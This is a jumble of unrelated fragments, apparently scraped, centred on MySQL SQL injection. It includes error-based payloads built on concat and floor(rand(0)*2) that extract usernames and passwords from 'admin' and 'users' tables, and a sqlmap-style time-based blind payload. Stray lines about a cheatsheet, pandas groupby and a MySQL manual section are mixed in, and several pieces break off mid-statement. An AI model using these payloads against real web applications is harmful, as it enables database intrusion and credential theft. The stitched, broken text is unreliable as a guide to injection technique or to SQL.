concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
I have decided to write a cheatsheet containing all that I have learnt from 2 years in the web application security field.
HocaXD has released a new security note SNEA India Community SQLi Vuln.
The CONCAT, rand, and min look like attempts to (partially) disguise the attack string. Perhaps from some automated detection algorithm?
-- file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))-- file.php?var=1 union select password from users where id=1 and row(1,1)
FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by=
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
# Payload: property_type=&city=(CASE WHEN (9487=9487) THEN SLEEP(5) ELSE 9487 END)&posted_by=
#
# Parameter: posted_by (GET)...
Note: The GROUP_CONCAT() function allows grouping of the tables/columns, instead of viewing them one at a time.
pandas: using min() together with groupby while keeping the data in the other columns, similar to GROUP BY ... HAVING MIN() in SQL.
11.15.3. GROUP BY and HAVING with Hidden Columns.